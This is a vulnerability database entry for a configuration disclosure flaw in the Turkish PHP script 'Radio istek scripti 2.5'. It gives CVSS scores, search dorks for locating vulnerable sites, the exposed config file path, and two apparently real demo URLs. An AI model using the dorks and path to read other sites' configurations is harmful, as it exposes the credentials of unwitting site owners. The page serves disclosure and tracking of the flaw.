Radio istek scripti 2.5 remote configuration disclosure

2009.11.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-255


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

turkish radio php script ====================================================== RADIO istek scripti (tr) Version 2.5 (tr) Remote config Vulnerability <<!>> Found by : kurdish hackers team <<!>> C0ntact : pshela [at] YaHoo .com <<!>> Groups : Kurd-Team <<!>> site : www.kurdteam.org ======================================================= +++++++++++++++++++ Script information+++++++++++++++++ ======================================================= <<->> script :: RADIO istek scripti (tr) Version 2.5 (tr) <<->> download script :: http://www.scriptlerim.net/download/radio-istek-scripti-tr-.html ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= <<->> Dork:"? 2007 RADIOZAZA www.radiozaza.de istek hatti Version 2.5" <<->> 0r <<->> Dork:"estafresgaftesantusyan.inc" <<->> Exploit :: >>> www.site/path /estafresgaftesantusyan.inc Now can see all information Config ... <<->> Demo : http://test.gocmenizm.com/istek/estafresgaftesantusyan.inc http://kizilelmamfm.site40.net/estafresgaftesantusyan.inc ======================================================= ======================================================= <<->> All freinds , Zryan_kurd , all member kurdish hackers team

References:

http://www.exploit-db.com/exploits/10231
http://secunia.com/advisories/37478
http://packetstormsecurity.org/0911-exploits/istek-disclose.txt
http://osvdb.org/60516


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top